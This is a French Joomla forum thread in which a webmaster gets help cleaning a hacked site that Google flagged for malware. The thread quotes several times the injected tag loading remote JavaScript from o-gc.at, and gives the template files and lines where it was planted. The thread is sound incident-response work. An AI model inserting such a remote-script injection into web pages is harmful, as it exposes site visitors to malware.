Problème de sécurité par google

Réduire
Ce sujet est fermé.
X
X
 
  • Filtrer
  • Heure
  • Afficher
Tout effacer
nouveaux messages

  • [RÉGLÉ] Problème de sécurité par google

    Bonjour à toute la Communauté

    Apparemment, j'aurais un problème de sécurité sur mon site.
    Google est en train d'avertir l'internaute qui voudrait consulter mon site avec ce message "Ce site risque d'endommager votre ordinateur."
    Google m'a entre autre envoyé un mail dont voici l'essentiel
    "Propriétaire du site ou du webmaster de Cher mpcdc.fr,
    Nous avons récemment découvert que certaines de vos pages peut causer aux utilisateurs d'être infecté par un logiciel malveillant. Nous avons commencé à montrer une page d'avertissement aux utilisateurs qui visitent ces pages en cliquant sur un résultat de recherche sur Google.com.
    Voici quelques exemples d'URL de votre site qui peuvent causer aux utilisateurs d'être infectés (espace inséré pour éviter clic accidentel dans le cas où vos client de messagerie auto-liens URL):
    http: // mpcdc .fr /
    http: //www.mpcdc .fr /
    http: // mpcdc .fr / index.php
    Voici un lien vers une page d'avertissement de l'échantillon:

    Nous vous encourageons fortement à enquêter immédiatement à protéger vos visiteurs. Bien que certains sites distribuent intentionnellement des logiciels malveillants, dans de nombreux cas, le webmaster n'est pas au courant parce que:
    1) le site a été compromise
    2) le site ne contrôle pas le contenu fourni par l'utilisateur malveillant
    3) le site affiche le contenu d'un réseau de publicité qui a un annonceur malveillant"


    - Dans un premier temps j'ai vérifié si j'étais infecté et je n'ai rien trouvé sur mon PC.
    - Les URLs qu'il précise n'existe pas sur mon site
    - Mon site n'a jamais rencontré ce genre de problème.

    Avec les outils de webmaster google (https://www.google.com/webmasters/to...ty-issues)dans le descriptif des problèmes de sécurité : "Logiciel malveillant non reconnu" et "Injection de code de logiciel malveillant" voici le détail et ceux pour un certain nombre d'exemples d'url :
    - http://www.mpcdc.fr/ <script type="text/javascript" src="http://o-gc.at/api.js">
    - http://www.mpcdc.fr/?catid=0&id=100 <script type="text/javascript" src="http://o-gc.at/api.js">
    Touts les exemples se réfèrent à <script type="text/javascript" src="http://o-gc.at/api.js">

    J'ai cherché cette information sur mon site et je ne trouve rien

    Ce que je voudrai savoir, si quelqu'un détient une solution à adopter, et comment remédier pour corriger cette problématique.
    Existe t'il un logiciel de scan pour vérifier les vulnérabilités d'un site pour Joomla;
    Je précise que mon site à toujours fonctionné correctement depuis des années avec joomla et je mets à régulièrement à jour à chaque fois qu'un patch est disponible. Actuellement ma version est la 2.5.24 avec le template lumière de rockettheme.

    Merci par avance de m'orienter vers une porte de sortie

  • #2
    Re : Problème de sécurité par google

    Bonjour

    Si Google dit avoir détecté du code malveillant, à priori, tu peux lui faire confiance.

    D'autant plus que Sucuri Sitecheck confirme le diagnostic : http://sitecheck.sucuri.net/results/www.mpcdc.fr/

    Envoyé par charlyjoom Voir le message
    Existe t'il un logiciel de scan pour vérifier les vulnérabilités d'un site pour Joomla;
    Tu as JAMSS (tu le trouveras sur Google) qui permet de scanner mais attention aux faux positifs puisqu'il va trouver suspicieux un grand nombre de code. A toi de savoir séparer le bon grain de l'ivraie.

    Tu as ... ton antivirus qui fait aussi très bien le job. Télécharge ton site en local et scanne-le.

    Envoyé par charlyjoom Voir le message
    Je précise que mon site à toujours fonctionné correctement depuis des années avec joomla et je mets à régulièrement à jour à chaque fois qu'un patch est disponible. Actuellement ma version est la 2.5.24 avec le template lumière de rockettheme.
    Une attaque peut avoir été mené sur un des composants que tu as et qui n'est pas à jour / qui contient une faille; peut avoir été fait sur un autre site du même serveur et qui aurait compromis le tien, etc. Les possibilités sont nombreuses et, juste pour bien préciser ce fait, ce n'est pas à cause du CMS. Ce n'est pas via Joomla qu'ils sont vraisemblablement passé mais par un maillon faible (l'analyse de tes logs permettra de le dire avec précision).

    Je te propose de lire cet article : http://www.aesecure.com/fr/blog/site-hacke.html

    Bonne soirée.
    Christophe (cavo789)
    Mon blog, on y parle Docker, PHP, WSL, Markdown et plein d'autres choses : https://www.avonture.be
    Logiciel gratuit de scan antivirus : https://github.com/cavo789/aesecure_quickscan (plus de 45.000 virus détectés, 700.000 fichiers sur liste blanche)​

    Commentaire


    • #3
      Re : Problème de sécurité par google

      Merci Cavo
      Tous mes composants sont à jour, je me fais un brin d'honneur à tenir à jour l'ensemble de mon site, d'autant plus que c'est professionnel.
      Je vais testé Jamss pour voir ce dont il est capable
      Je vais télécharger un backup du site et le ré-installer en local et vérifier avec mon antivirus et surtout lire ton article, si c'est celui que je crois avoir vu je regrette de ne pas l'avoir lu de a à z

      Je te tiens au courant, et une bonne soirée également.
      Didier

      Commentaire


      • #4
        Re : Problème de sécurité par google

        Bonjour Cavo
        Tout est réglé !!!!
        Tu as JAMSS (tu le trouveras sur Google) qui permet de scanner mais attention aux faux positifs puisqu'il va trouver suspicieux un grand nombre de code. A toi de savoir séparer le bon grain de l'ivraie.
        J'ai testé mais trop d'informations à cernés, il renvoi tout les codes php, pas assez de connaissance en la matière !

        Tu as ... ton antivirus qui fait aussi très bien le job. Télécharge ton site en local et scanne-le.
        J'ai fais un scan minutieux et il n'a pas été capable de déceler quoi que ce soit, pour lui tout était clean.
        Par contre une fois le backup distant réinstaller en local, j'ai pu trouver avec notepad++ le problème qui me concernait :
        ...\www\MPCDC\templates\atomic\index.php (1 hit)
        Line 110: <script type="text/javascript" src="http://o-gc.at/api.js"></script></body>
        ...\www\MPCDC\templates\beez5\index.php (1 hit)
        Line 283: <script type="text/javascript" src="http://o-gc.at/api.js"></script></body>
        ...\www\MPCDC\templates\beez_20\index.php (1 hit)
        Line 248: <script type="text/javascript" src="http://o-gc.at/api.js"></script></body>
        ...\www\MPCDC\templates\rt_chapelco\index.php (1 hit)
        Line 200: <script type="text/javascript" src="http://o-gc.at/api.js"></script></body>
        ...\www\MPCDC\templates\rt_lumiere\index.php (1 hit)
        Line 201: <script type="text/javascript" src="http://o-gc.at/api.js"></script></body>
        ...\www\MPCDC\templates\system\index.php (1 hit)
        Line 11: echo "<script type=\"text/javascript\" src=\"http://o-gc.at/api.js\"></script>";
        J'ai supprimé les scripts, uploadé les doc concernés et après une nouvelle révision de la part de Google, il a rétabli la situation en supprimant le message d'avertissement. OUF !!!!!

        Je te propose de lire cet article : http://www.aesecure.com/fr/blog/site-hacke.html
        Par contre ça c'est génial !!!
        Avec mes remerciements pour ton aide .
        A une prochaine.
        CharlyJoom.

        Commentaire

        Annonce

        Réduire
        Aucune annonce pour le moment.

        Partenaire de l'association

        Réduire

        Hébergeur Web PlanetHoster
        Travaille ...
        X